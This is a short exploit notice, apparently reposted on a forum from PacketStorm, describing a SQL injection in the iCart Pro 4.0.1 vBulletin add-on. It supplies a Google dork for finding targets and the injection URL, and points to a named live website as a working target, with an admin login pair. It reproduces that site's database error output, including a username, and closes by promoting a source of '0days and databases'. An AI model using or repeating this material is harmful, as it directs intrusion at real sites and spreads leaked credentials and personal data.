iCart Pro 4.0.1 SQL Injection

Praetorian503 · January 26, 2013

iCart Pro version 4.0.1 appears to suffer from a remote SQL injection vulnerability.

# Exploit Title: vbcovor ICART SQLI
# Date: 25/01/2013
# Author(s): n3tw0rk
# Contact: Mail:infectedelite@gmail.com
# Product: iCart Pro
# Software Version 4.0.1
# Product Download: http://www.vbcover.com/icart.php?do=product&productid=61
# Google Dork: inurlicart.php
# Require Editting product access for SQL error admin account will work
# Exploit link:icart.php?do=editproduct&productid=[product ID]&section='

Live link:https://www.rostyles.com/forum/icart.php?do=editproduct&productid=19&section='
(requires admin access login test:1234)

Database error in vBulletin 4.2.0:

Invalid SQL:
SELECT name, ' FROM covercartproduct WHERE id = '19';

MySQL Error   : You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to
use near '19'' at line 1
Error Number  : 1064
Request Date  : Friday, January 25th 2013 @ 06:46:30 AM
Error Date    : Friday, January 25th 2013 @ 06:46:31 AM
Script        :
http://www.rostyles.com/forum/icart.php?do=editproduct&productid=19&section='
Referrer      :
IP Address    :
Username      : Teascu Dorin
Classname     : vB_Database
MySQL Version : 5.0.96-log



Shouts to: Teoz, n0tch, shadow008. http://myupdatezone.com for more
0days and databases

Source: PacketStorm

Sign In

iCart Pro 4.0.1 SQL Injection

Recommended Posts

Praetorian503

Join the conversation

Browse

Activity

Pages